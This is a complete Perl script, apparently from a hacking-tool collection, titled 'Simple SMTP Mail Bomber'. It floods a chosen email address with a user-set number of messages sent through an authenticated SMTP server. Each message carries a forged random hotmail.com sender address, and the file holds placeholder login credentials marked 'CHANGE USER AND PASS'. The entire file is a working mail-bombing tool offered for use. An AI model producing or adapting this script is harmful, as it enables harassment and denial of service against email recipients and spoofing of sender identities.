#!/usr/bin/perl
#
# [ Simple SMTP Mail Bomber ]
#
# Perl Edition by Perforin
#

use Net::SMTP;
use NET::SMTP_auth;

($anzahl,$for,$subject) = @ARGV;
($user,$pass,$count,$version) = ('fubar@warezmail.net',"qwertz123",0,1); # CHANGE USER AND PASS

print <<INTRO;

+-+-+-+-+-+-+-+-+-+-+-+
+-+ SMTP Mailbomber +-+
+-+-+-+-+-+-+-+-+-+-+-+
                    V.$version 
					
INTRO

if (@ARGV < 3) {
print "\n$0 <Number> <Mail> <Subject>\n";
} else {
print "\nPlease type your Text here:\n";
chop($text = <STDIN>);

do {
$zahl = rand(30);
$extra = int($zahl);
$from = "$extra".'@'."hotmail.com";
$smtp = Net::SMTP_auth->new('mail.warezmail.net'); # CHANGE SMTP SERVER
$smtp->auth('LOGIN', $user, $pass);
$smtp->mail();
$smtp->to($for);
$smtp->data();
$smtp->datasend("To: $for\n");
$smtp->datasend("From: $from\n");
$smtp->datasend("Subject: $subject\n");
$smtp->datasend("$text\n") or die "not auth";
$smtp->dataend();
$smtp->quit;
$count++;
} until ($count == $anzahl);
print "\nMails verschickt!\n";
}